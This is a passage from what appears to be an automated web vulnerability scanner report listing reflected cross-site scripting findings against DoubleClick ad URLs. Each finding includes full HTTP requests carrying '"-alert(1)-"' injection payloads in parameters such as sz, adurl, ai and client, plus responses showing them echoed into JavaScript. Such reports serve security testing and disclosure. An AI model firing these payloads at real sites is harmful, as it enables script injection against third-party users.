5261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F80b32"-alert(1)-"ef983b9ef6f&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:31:06 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mpID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F80b32"-alert(1)-"ef983b9ef6f&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B41964175");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

5.53. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload def7e"-alert(1)-"794b3e972bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&def7e"-alert(1)-"794b3e972bd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:03:06 GMT
Content-Length: 8031

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&def7e"-alert(1)-"794b3e972bd=1http://www.cosmopolitanlasvegas.com/stay/packages/book3-stay4.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+Book3Stay4&utm_source=Media6&utm_medium=display&utm_content=Book3Stay4&utm_campaign=DR"
...[SNIP]...

5.54. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77e7"-alert(1)-"a6981aa979f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=d77e7"-alert(1)-"a6981aa979f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:02:26 GMT
Content-Length: 8065

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=d77e7"-alert(1)-"a6981aa979fhttp://www.cosmopolitanlasvegas.com/stay/packages/room-for-three.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+RoomforThree&utm_source=Media6&utm_medium=display&utm_content=RoomforThree&utm_campaig
...[SNIP]...

5.55. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac2c9"-alert(1)-"a68a2b26d28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&ac2c9"-alert(1)-"a68a2b26d28=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:03:03 GMT
Content-Length: 8154

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&ac2c9"-alert(1)-"a68a2b26d28=1http://www.cosmopolitanlasvegas.com/stay/packages/sun-and-nights.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+SunAndNights&utm_source=Media6&utm_medium=display&utm_content=SunAndNights&utm_campa
...[SNIP]...

5.56. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f58a"-alert(1)-"e76dfae306f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=4f58a"-alert(1)-"e76dfae306f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:02:23 GMT
Content-Length: 8008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=4f58a"-alert(1)-"e76dfae306fhttp://www.cosmopolitanlasvegas.com/stay/packages/book3-stay4.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+Book3Stay4&utm_source=Media6&utm_medium=display&utm_content=Book3Stay4&utm_campaign=DR");
...[SNIP]...

5.57. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90a"-alert(1)-"11a49fb03de was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=1a90a"-alert(1)-"11a49fb03de HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7447
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:53:46 GMT
Expires: Wed, 11 May 2011 15:53:46 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
Fzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=1a90a"-alert(1)-"11a49fb03dehttps://www.hiltonhhonors.com/landingpages/GrandNights.aspx?lang=EN&WT.mc_id=zEWWABB0US1HN2DMH411Q027HE840724&cssiteid=1004575&csdartid=6115818341094506");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

5.58. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b99"-alert(1)-"27c743e65b4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQBd7b99"-alert(1)-"27c743e65b4&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:50:41 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
J2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQBd7b99"-alert(1)-"27c743e65b4&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE8
...[SNIP]...

5.59. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6884"-alert(1)-"7d9b4c2e543 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

